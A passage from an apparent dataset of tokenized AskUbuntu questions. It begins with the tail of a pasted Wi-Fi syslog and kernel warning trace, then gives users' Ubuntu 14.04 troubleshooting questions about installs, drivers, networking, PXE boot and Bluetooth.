21:00:52 nightfurry wpa_supplicant [ 1728 ] : wlan0 : ctrl-event-scan-started apr 27 21:00:52 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 27 21:01:01 nightfurry kernel : [ 4251.424502 ] cfg80211 : calling crda to update world regulatory domain apr 27 21:01:01 nightfurry kernel : [ 4251.426672 ] cfg80211 : world regulatory domain updated : apr 27 21:01:01 nightfurry kernel : [ 4251.426674 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 27 21:01:01 nightfurry kernel : [ 4251.426675 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:01 nightfurry kernel : [ 4251.426676 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:01 nightfurry kernel : [ 4251.426677 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:01 nightfurry kernel : [ 4251.426677 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:01 nightfurry kernel : [ 4251.426678 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:01 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > disconnected apr 27 21:01:06 nightfurry networkmanager [ 1543 ] : < warn > ( wlan0 ) : link timed out . apr 27 21:01:06 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : activated - > failed ( reason 'ssid not found ' ) [ 100 120 53 ] apr 27 21:01:06 nightfurry networkmanager [ 1543 ] : < warn > activation ( wlan0 ) failed for connection 'atlantis' apr 27 20:57:56 nightfurry dbus [ 1350 ] : message repeated 25 times : [ [ system ] reloaded configuration ] apr 27 21:01:06 nightfurry dbus [ 1350 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 27 21:01:06 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] apr 27 21:01:06 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : deactivating device ( reason 'none ' ) [ 0 ] apr 27 21:01:06 nightfurry dbus [ 1350 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 27 21:01:07 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : canceled dhcp transaction , dhcp client pid 7549 apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : withdrawing address record for 2a02:810d:400:75c:9c5d:5278 : c9f6:3434 on wlan0 . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : withdrawing address record for 2a02:810d:400:75c:62a4:4cff : fedb:323b on wlan0 . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : leaving mdns multicast group on interface wlan0.ipv6 with address 2a02:810d:400:75c:62a4:4cff : fedb:323b . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :62a4:4cff : fedb:323b . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : registering new address record for fe80 : :62a4:4cff : fedb:323b on wlan0.* . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : withdrawing address record for fe80 : :62a4:4cff : fedb:323b on wlan0 . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : leaving mdns multicast group on interface wlan0.ipv6 with address fe80 : :62a4:4cff : fedb:323b . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : interface wlan0.ipv6 no longer relevant for mdns . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : withdrawing address record for 192.168.178.30 on wlan0 . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : leaving mdns multicast group on interface wlan0.ipv4 with address 192.168.178.30 . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : interface wlan0.ipv4 no longer relevant for mdns . apr 27 21:01:07 nightfurry avahi-daemon [ 1531 ] : received packet from invalid interface . apr 27 21:01:07 nightfurry networkmanager [ 1543 ] : < info > policy set 'kabelnetzwerkverbindung 2 ' ( usb0 ) as default for ipv4 routing and dns . apr 27 21:01:07 nightfurry networkmanager [ 1543 ] : < info > writing dns information to /sbin/resolvconf apr 27 21:01:07 nightfurry dnsmasq [ 2246 ] : vorgelagerte server von dbus gesetzt apr 27 21:01:07 nightfurry dnsmasq [ 2246 ] : benutze namensserver fd00 : :9ec7 : a6ff : fe94:8c70 # 53 apr 27 21:01:07 nightfurry dnsmasq [ 2246 ] : benutze namensserver 192.168.42.129 # 53 apr 27 21:01:07 nightfurry dnsmasq [ 2246 ] : vorgelagerte server von dbus gesetzt apr 27 21:01:07 nightfurry dnsmasq [ 2246 ] : benutze namensserver 192.168.42.129 # 53 apr 27 21:01:08 nightfurry avahi-daemon [ 1531 ] : joining mdns multicast group on interface wlan0.ipv6 with address fe80 : :62a4:4cff : fedb:323b . apr 27 21:01:08 nightfurry avahi-daemon [ 1531 ] : new relevant interface wlan0.ipv6 for mdns . apr 27 21:01:08 nightfurry avahi-daemon [ 1531 ] : registering new address record for fe80 : :62a4:4cff : fedb:323b on wlan0.* . apr 27 21:01:07 nightfurry networkmanager [ 1543 ] : < info > writing dns information to /sbin/resolvconf apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > auto-activating connection 'atlantis ' . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) starting connection 'atlantis' apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0/wireless ) : access point 'atlantis ' has security , but secrets are required . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) scheduled ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > inactive apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) started ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) scheduled ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 1 of 5 ( device prepare ) complete . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) starting ... apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0/wireless ) : connection 'atlantis ' has security , and secrets exist . no new secrets needed . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > config : added 'ssid ' value 'atlantis' apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > config : added 'scan_ssid ' value '1' apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > config : added 'psk ' value ' < omitted > ' apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > activation ( wlan0 ) stage 2 of 5 ( device configure ) complete . apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > config : set interface ap_scan to 1 apr 27 21:01:07 nightfurry wpa_supplicant [ 1728 ] : message repeated 2 times : [ wlan0 : ctrl-event-scan-started ] apr 27 21:01:09 nightfurry wpa_supplicant [ 1728 ] : wlan0 : trying to associate with 9c : c7 : a6:94:8c:72 ( ssid='atlantis ' freq=2447 mhz ) apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : inactive - > associating apr 27 21:01:09 nightfurry wpa_supplicant [ 1728 ] : wlan0 : ctrl-event-assoc-reject status_code=16 apr 27 21:01:09 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : associating - > disconnected apr 27 21:01:10 nightfurry wpa_supplicant [ 1728 ] : wlan0 : ctrl-event-scan-started apr 27 21:01:10 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : disconnected - > scanning apr 27 21:01:15 nightfurry kernel : [ 4265.614540 ] cfg80211 : calling crda to update world regulatory domain apr 27 21:01:15 nightfurry networkmanager [ 1543 ] : < info > ( wlan0 ) : supplicant interface state : scanning - > disconnected apr 27 21:01:15 nightfurry kernel : [ 4265.617949 ] cfg80211 : world regulatory domain updated : apr 27 21:01:15 nightfurry kernel : [ 4265.617951 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 27 21:01:15 nightfurry kernel : [ 4265.617952 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:15 nightfurry kernel : [ 4265.617954 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:15 nightfurry kernel : [ 4265.617954 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:15 nightfurry kernel : [ 4265.617955 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:15 nightfurry kernel : [ 4265.617956 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 27 21:01:18 nightfurry kernel : [ 4268.588366 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- apr 27 21:01:18 nightfurry kernel : [ 4268.588396 ] warning : cpu : 0 pid : 833 at /build/buildd/linux-3.13.0/net/wireless/sme.c:797 cfg80211_roamed+0x89/0x90 [ cfg80211 ] ( ) apr 27 21:01:18 nightfurry kernel : [ 4268.588397 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) ipt_masquerade iptable_nat nf_nat_ipv4 nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack ipt_reject xt_checksum iptable_mangle xt_tcpudp bridge stp llc ip6table_filter ip6_tables iptable_filter ip_tables ebtable_nat ebtables x_tables michael_mic arc4 rfcomm bnep dm_crypt binfmt_misc snd_hda_codec_hdmi nls_iso8859_1 mxm_wmi uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev rndis_host cdc_ether joydev usbnet mii xpad ff_memless snd_usb_audio snd_usbmidi_lib x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel btusb aesni_intel aes_x86_64 lrw dm_multipath gf128mul scsi_dh glue_helper ablk_helper cryptd psmouse lib80211_crypt_tkip serio_raw bluetooth wl ( pof ) snd_hda_codec_realtek snd_seq_midi snd_seq_midi_event lib80211 cfg80211 snd_rawmidi snd_hda_intel snd_seq snd_hda_codec snd_seq_device snd_hwdep wmi snd_pcm parport_pc snd_page_alloc ppdev nvidia ( pof ) snd_timer lpc_ich mei_me snd mei drm lp parport intel_smartconnect soundcore mac_hid hid_logitech_dj hid_generic usbhid hid dm_mirror dm_region_hash dm_log e1000e ahci ptp libahci pps_core video apr 27 21:01:18 nightfurry kernel : [ 4268.588442 ] cpu : 0 pid : 833 comm : wl_event_handle tainted : pf w o 3.13.0-24-generic # 46-ubuntu apr 27 21:01:18 nightfurry kernel : [ 4268.588442 ] hardware name : to be filled by o.e.m . to be filled by o.e.m./z87m oc formula , bios p1.60 11/22/2013 apr 27 21:01:18 nightfurry kernel : [ 4268.588443 ] 0000000000000009 ffff88003616fd88 ffffffff81715a64 0000000000000000 apr 27 21:01:18 nightfurry kernel : [ 4268.588445 ] ffff88003616fdc0 ffffffff810676bd ffff880408201000 ffff8800119ef840 apr 27 21:01:18 nightfurry kernel : [ 4268.588447 ] 000000000000009c ffff8800119eff00 0000000000000001 ffff88003616fdd0 apr 27 21:01:18 nightfurry kernel : [ 4268.588448 ] call trace : apr 27 21:01:18 nightfurry kernel : [ 4268.588452 ] [ < ffffffff81715a64 > ] dump_stack+0x45/0x56 apr 27 21:01:18 nightfurry kernel : [ 4268.588455 ] [ < ffffffff810676bd > ] warn_slowpath_common+0x7d/0xa0 apr 27 21:01:18 nightfurry kernel : [ 4268.588456 ] [ < ffffffff8106779a > ] warn_slowpath_null+0x1a/0x20 apr 27 21:01:18 nightfurry kernel : [ 4268.588462 ] [ < ffffffffa0c80509 > ] cfg80211_roamed+0x89/0x90 [ cfg80211 ] apr 27 21:01:18 nightfurry kernel : [ 4268.588480 ] [ < ffffffffa0e63528 > ] wl_bss_connect_done.isra.21+0x98/0x1a0 [ wl ] apr 27 21:01:18 nightfurry kernel : [ 4268.588495 ] [ < ffffffffa0e6382c > ] wl_notify_connect_status+0x1fc/0x410 [ wl ] apr 27 21:01:18 nightfurry kernel : [ 4268.588508 ] [ < ffffffffa0e62135 > ] wl_event_handler+0x55/0x220 [ wl ] apr 27 21:01:18 nightfurry kernel : [ 4268.588521 ] [ < ffffffffa0e620e0 > ] ? wl_get_assoc_ies+0x240/0x240 [ wl ] apr 27 21:01:18 nightfurry kernel : [ 4268.588523 ] [ < ffffffff8108b312 > ] kthread+0xd2/0xf0 apr 27 21:01:18 nightfurry kernel : [ 4268.588525 ] [ < ffffffff8108b240 > ] ? kthread_create_on_node+0x1d0/0x1d0 apr 27 21:01:18 nightfurry kernel : [ 4268.588527 ] [ < ffffffff8172637c > ] ret_from_fork+0x7c/0xb0 apr 27 21:01:18 nightfurry kernel : [ 4268.588528 ] [ < ffffffff8108b240 > ] ? kthread_create_on_node+0x1d0/0x1d0 apr 27 21:01:18 nightfurry kernel : [ 4268.588529 ] -- - [ end trace 537bf9b9d5649ad9 ] -- - apr 27 21:01:18 nightfurry kernel : [ 4268.605285 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- -- apr 27 21:01:18 nightfurry kernel : [ 4268.605306 ] warning : cpu : 0 pid : 833 at /build/buildd/linux-3.13.0/net/wireless/sme.c:797 cfg80211_roamed+0x89/0x90 [ cfg80211 ] ( ) apr 27 21:01:18 nightfurry kernel : [ 4268.605307 ] modules linked in : pci_stub vboxpci ( of ) vboxnetadp ( of ) vboxnetflt ( of ) vboxdrv ( of ) ipt_masquerade iptable_nat nf_nat_ipv4 nf_nat nf_conntrack_ipv4 nf_defrag_ipv4 xt_conntrack nf_conntrack ipt_reject xt_checksum iptable_mangle xt_tcpudp bridge stp llc ip6table_filter ip6_tables iptable_filter ip_tables ebtable_nat ebtables x_tables michael_mic arc4 rfcomm bnep dm_crypt binfmt_misc snd_hda_codec_hdmi nls_iso8859_1 mxm_wmi uvcvideo videobuf2_vmalloc videobuf2_memops videobuf2_core videodev rndis_host cdc_ether joydev usbnet mii xpad ff_memless snd_usb_audio snd_usbmidi_lib x86_pkg_temp_thermal intel_powerclamp coretemp kvm_intel kvm crct10dif_pclmul crc32_pclmul ghash_clmulni_intel btusb aesni_intel aes_x86_64 lrw dm_multipath gf128mul scsi_dh glue_helper ablk_helper cryptd psmouse lib80211_crypt_tkip serio_raw bluetooth wl ( pof ) snd_hda_codec_realtek snd_seq_midi snd_seq_midi_event lib80211 cfg80211 snd_rawmidi snd_hda_intel snd_seq snd_hda_codec snd_seq_device snd_hwdep wmi snd_pcm parport_pc snd_page_alloc ppdev nvidia ( pof ) snd_timer lpc_ich mei_me snd mei drm lp parport intel_smartconnect soundcore mac_hid hid_logitech_dj hid_generic usbhid hid dm_mirror dm_region_hash dm_log e1000e ahci ptp libahci pps_core video
456570	installing ubuntu 14.04 issues seeing install on desktop	i 'm trying to install ubuntu on a small pc i built , specs : ecs h87h3-ti thin-mini itx motherboard i3 4330 cpu 8gb of ram 120gb ssd . whenever i try to install ubuntu , whether through flash storage or dvd , i get the same result : it boots to the regular options to either install , run off usb , check for disk errors , etc. , i select 'install ' , the desktop shows up , but it 's completely empty ... i can move the mouse and i have the regular options in the top right corner on the grey bar , but i have nothing else on the screen apart from the wallpaper and if i move the mouse past the left or bottom edge of the screen , it continues on as if the desktop extends past what i can actually see . i tried to adjust the screen settings but there 's nothing that i could find to let me adjust to have everything appear on one screen . i also tried multiple different monitors and i get the same results . i searched on the net for an answer but i found nothing related to my issue . there are a lot of posts of people getting just black screens , but i have the desktop , but no installation window .
456572	broadcom 4727 interface not showing	im new here . im using ubuntu ( 14.04 ) so im a little bit confused about the wifi card modules ( b43 , brcmsmac ) . model no : 14e4:4727 thank you
456574	problems running ubuntu 14.04 inside of a virtual machine within virtual box	i downloaded a disk image of ubuntu 14.04 and when tried to run it inside of a virtual machine within virtual box it only pops up with a blank screen , and nothing else . could installing install guest additions fix this problem ?
456576	ca n't connect laptop to tv via hdmi	my laptop has intel graphics . i get `` not support '' when i plug it into the tv . it worked on 12.10 but not 13.10 or 14.04
456579	how to install hda-jack-retask in 14.04 ?	i recently upgraded to 14.04 from 12.04 . my hp has beats ( cue groans of pain , as it 's just a gimmick ) . in 12.04 , i used hda-jack-retask to fix it . however , as far as i can tell he has not updated it to work with 14.04 . is there a different tool out there to get beats to work with linux ?
456580	nouveau driver and mirror monitor on ubuntu 12.04	i am using nouveau drivers in ubuntu 12.04 64-bit with a nvidia gtx560 video card connected to two monitors . if i try to go in settings > displays > mirror display , my resolution goes from 1920x1080 to 480x680 for both monitors . to avoid this i am forced to use the displays as two separate monitors , in which case the resolution stays untouched ( 1680x1050 the first monitor and 1920x1080 the second ) . how can i configure the drivers/system to get the maximum resolution when in mirror mode ? my config is : opengl : nouseau ; render : gallium 0.4 on nvce ; opengl version : 3.0 mesa 9.2.1 ; client glx : 1.4 ; server glx : sgi ; server glx version : 1.4 ; glx version : 1.4
456587	how do i replace grub with burg ?	i was just wondering if it was safe to install burg on ubuntu 14.04 and how do to it . it has not been updated for a while , so maybe the project is dead . if it 's not possible to replace grub with burg , are there any alternatives to burg .
456590	umlauts in windows text files not recognized under ubuntu	i am pretty new to ubuntu and right now need to use both windows and ubuntu depending on the context . one problem i encountered is that ubuntu does not seem to recognize umlauts and such ( which are pretty essential , since i write in german ) in text files created under windows . instead i just see a � symbol . this also translates to pdftex output where these appear as `` ï¿1⁄2 '' . since this issue appears both in gedit and eclipse ( and through latex ) it can not be cause by the viewer . but it ca n't really be a problem of the file encoding either , can it ? under windows the same files worked just fine . ( i do , however , not know what the encoding is and was not able to figure that out using both gedit and the file manager . ) what 's the cause of this behaviour and how can i prevent it ? edit : output of file -i document.tex : document.tex : text/x-tex ; charset=iso-8859-1 output of locale : lang=de_de.utf-8 language=en lc_ctype= '' de_de.utf-8 '' lc_numeric= '' de_de.utf-8 '' lc_time= '' de_de.utf-8 '' lc_collate= '' de_de.utf-8 '' lc_monetary= '' de_de.utf-8 '' lc_messages= '' de_de.utf-8 '' lc_paper= '' de_de.utf-8 '' lc_name= '' de_de.utf-8 '' lc_address= '' de_de.utf-8 '' lc_telephone= '' de_de.utf-8 '' lc_measurement= '' de_de.utf-8 '' lc_identification= '' de_de.utf-8 '' lc_all=
456591	switching to lubuntu dows not work	i just upgraded my older laptop to ubuntu 14.04 and i want to try something more lightweight . so , i installed lubuntu-desktop as recommended in how to replace ubuntu with lubuntu and it made no difference . when i purged unity and unity-2das recommended in is there an easy way to change ubuntu flavor during upgrade ? , the unity panel on top of the screen disappeared but no new menus are available and pressing the `` start '' button ( on the left ) does not do anything . i hoped that i would see something similar to the pre-unity ubuntu , but this did not happen . so , how do i switch from ubuntu to lubuntu ( without burning a cd and installing from scratch ? ( or at least get a working ubuntu back ! )
456593	how to create a user who can only access one directory ?	i 'm running ubuntu server 12.04 . i was wondering how i can set up a user to only access one directory . for example , i want to create a user 'brad ' and want him to only have access to /var/www/brad . there , he can add and edit files as he pleases . also , how could i give him access to phpmyadmin to create db 's ?
456594	linux stops at `` switched to clocksource tsc '' after fresh install of 14.04 -- setup or reinstall ?	i 've been looking forward to installing the latest greatest daily build of ubuntu 14.04 into my 'new ' x301 lenovo , which seemed promising as the os preview from live usb worked rather well . unfortunately , the bootloading got stuck and after using recovery mode boot option , i got this : where booting and all signs of work stop after `` switching to clocksource tsc '' -- the os just hangs so . i tried editing the grub command , namely the linux line , as suggested at https : //bbs.archlinux.org/viewtopic.php ? pid=1184419 # p1184419 and a few more tweeks , then lost the naive hopes and came to ask here -- is there any way to use the latest version of ubutnu distro on my machine ? what would you suggest for my case ?
456597	bluetooth not working after upgrading from 12.04 to 14.04	it is telling that no bluetooth adapter found but i was using bluetooth on 12.04. shishir @ shishir-hp-probook-445-g1 : ~ $ bluetoothd -d -n bluetoothd [ 5782 ] : bluetooth daemon 4.101 bluetoothd [ 5782 ] : src/main.c : parse_config ( ) parsing main.conf bluetoothd [ 5782 ] : src/main.c : parse_config ( ) discovto=0 bluetoothd [ 5782 ] : src/main.c : parse_config ( ) pairto=0 bluetoothd [ 5782 ] : src/main.c : parse_config ( ) pageto=8192 bluetoothd [ 5782 ] : src/main.c : parse_config ( ) auto_to=60 bluetoothd [ 5782 ] : src/main.c : parse_config ( ) name= % h- % d bluetoothd [ 5782 ] : src/main.c : parse_config ( ) class=0x000100 bluetoothd [ 5782 ] : src/main.c : parse_config ( ) key file does not have key 'deviceid' d-bus setup failed : connection `` :1.144 '' is not allowed to own the service `` org.bluez '' due to security policies in the configuration file bluetoothd [ 5782 ] : unable to get on d-bus shishir @ shishir-hp-probook-445-g1 : ~ $ /var/log/dmesg bash : /var/log/dmesg : permission denied shishir @ shishir-hp-probook-445-g1 : ~ $ hcitool dev devices : shishir @ shishir-hp-probook-445-g1 : ~ $ dmesg | grep blue [ 18.895961 ] bluetooth : core ver 2.17 [ 18.896024 ] bluetooth : hci device and connection manager initialized [ 18.896035 ] bluetooth : hci socket layer initialized [ 18.896039 ] bluetooth : l2cap socket layer initialized [ 18.896045 ] bluetooth : sco socket layer initialized [ 18.908410 ] bluetooth : rfcomm tty layer initialized [ 18.908423 ] bluetooth : rfcomm socket layer initialized [ 18.908433 ] bluetooth : rfcomm ver 1.11 [ 18.928483 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 18.928489 ] bluetooth : bnep filters : protocol multicast [ 18.928500 ] bluetooth : bnep socket layer initialized shishir @ shishir-hp-probook-445-g1 : ~ $ rfkill list 0 : phy0 : wireless lan soft blocked : no hard blocked : no
456601	ctrl+alt+l not activating screensaver	when i first installed ubuntu 14.04 the keyboard shortcut ctrl+alt+l would activate the screensaver . now , after i had to do a reinstall that shortcut locks the account and goes to lock screen . super+l also locks the account . how can i get it back to where ctrl+alt+l activates the screensaver and the setting in the gear on the top right says `` activate screensaver '' and not `` lock '' .
456602	`` pin down '' an automatically installed package so apt-get autoremove keeps it	say i install package a , which depends on package b . then i remove a . now apt-get autoremove wants to remove b , but i want to keep it . how do i `` pin down '' b so that the system acts as if i installed b myself ? i come from gentoo , where the solution would be to add b to my world file . what 's the debian/ubuntu equivalent ?
456604	how to map an ubuntu share on another ubuntu machine ?	i 've found questions on mapping a windows share in ubuntu , and an ubuntu server share on windows , and samba , and ntfs , and virtualbox -- but i ca n't find how to map an ubuntu share on another ubuntu machine ... ! i 'm running 2 pc 's at home , both plain-vanilla ubuntu 14.04 . on both , some folders have been shared using nautilus , right-clicking on a folder and choosing `` local network share '' . in nautilus , i can `` browse network '' and see the shared folders , but when i show the address ( ctrl+l ) then it 's like `` smb : //other-desktop/public/ '' . my apps ( specifically beyond compare 3 ) wo n't read that path . how do i map a remote folder to my local filesystem tree ? ? update : this post lists many ways to share . surely , one among them is more recommended for normal users ? i 'm not looking for `` datacenter-scale '' solutions -- just something simple that i can explain to my wife : )
456605	limited internet access after setting a satic ip address in server 14.04	i edited my /etc/network/interfaces file for a static ip address . it 's listing is : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # the primary network interface # the next two lines from the install ( use dhcp for getting the address ) in the file they're # commented out . # # # auto eth0 # # # iface eth0 inet dhcp # set static ip address via code from askubuntu auto eth0 iface eth0 inet static address 192.168.1.45 netmask 255.255.255.0 broadcast 192.168.1.255 dns-nameservers 192.168.1.1 192.168.1.1 # this is an autoconfigured ipv6 interface iface eth0 inet6 auto the output of the ifconfig command is : eth0 link encap : ethernet hwaddr 00:15:58:67:73:9d inet addr:192.168.1.45 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : 2602:306:8074:46e0:8c2d:580:6494 : c689/64 scope : global inet6 addr : fe80 : :215:58ff : fe67:739d/64 scope : link inet6 addr : 2602:306:8074:46e0:215:58ff : fe67:739d/64 scope : global up broadcast running multicast mtu:1500 metric:1 rx packets:105 errors:0 dropped:26 overruns:0 frame:0 tx packets:124 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:7062 ( 7.0 kb ) tx bytes:18917 ( 18.9 kb ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:172 errors:0 dropped:0 overruns:0 frame:0 tx packets:172 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:37566 ( 37.5 kb ) tx bytes:37566 ( 37.5 kb ) the problem is that firefox will only access a few urls . ones that work : www.att.com my.yahoo.com www.google.com www.buffalotech.com ( via a google search ) sites that wo n't work : www.askubuntu.com www.buffalotech.com ( not using google ) www.amazon.com yahoo 's login page yahoo 's mail page i do n't understand why some sites work and others do n't . i can ping to and from ubuntu server from other machines on my local network . could the issue involve ip6 protocol ? maybe some sites are using it and others are n't . if i need to include a static ip6 address , how do i get its value ( s ) ? i would really appreciate help on this one . i 'm trying to set the server up as a samba primary domain controller and need to assign it a static ip address .
456607	why wo n't my laptop pxe boot ?	i set up a pxe boot server according to this tutorial , and then made a diskless workstation according to this tutorial . whenever i try to pxe boot my compaq presario f700 , it says : pxe-e51 : no dhcp or proxydhcp offers were received when i tried to boot a different computer , it worked just fine , and i started the diskless ubuntu . why wo n't it boot ? some more information . the light on the ethernet port of the laptop flashes when it 's searching . it searches for a while before giving me the error . it used to work with other pxe boot servers i made ( a while ago i tried to do this , but could not get the second tutorial to work , but i still got a working pxe boot server running ) . maybe it stopped working because of old age , it 's about 7 years old . here are the uncommented lines on the dhcp server config file : ddns-update-style none ; option domain-name `` example.org '' ; option domain-name-servers ns1.example.org , ns2.example.org ; default-lease-time 86400 ; max-lease-time 604600 ; log-facility local7 ; subnet 192.168.1.0 netmask 255.255.255.0 { range 192.168.1.170 192.168.1.200 ; option domain-name-servers 8.8.4.4 ; option routers 192.168.1.1 ; option broadcast-address 192.168.1.255 ; default-lease-time 86400 ; max-lease-time 604800 ; } next-server 192.168.1.35 ; filename `` pxelinux.0 '' ; need any more information ? edit : it might also be important to say that the laptop displays a mac address , and guid of all 0 's .
456609	ca n't open ubuntu server 14.04 lts .iso file ?	i downloaded ubuntu server 14.04 lts to my windows 7 64-bit computer , but when i try to open and run the download , i receive the following message : windows ca n't open this file . how do i open and run this file ?
456610	/usr/bin/ld : error : can not find -lpython2.7	while installing pyscard.py i get this error , gcc -pthread -shared -wl , -rpath , $ origin/../lib -g -l/home/builder/jenkins/workspace/python_masters/arch/x86_64/label/linux/core/lib build/temp.linux-x86_64-2.7/smartcard/scard/helpers.o build/temp.linux-x86_64-2.7/smartcard/scard/winscarddll.o build/temp.linux-x86_64-2.7/smartcard/scard/scard_wrap.o -l/home/builder/jenkins/workspace/python_masters/arch/x86_64/label/linux/core/lib -lpython2.7 -lpython2.7 -o build/lib.linux-x86_64-2.7/smartcard/scard/_scard.so /usr/bin/ld : error : can not find -lpython2.7 /usr/bin/ld : error : can not find -lpython2.7 collect2 : ld returned 1 exit status error : command 'gcc ' failed with exit status 1 i found this post with the same problem , i ca n't get it work though , can anyone clarify this for me please ? thank you
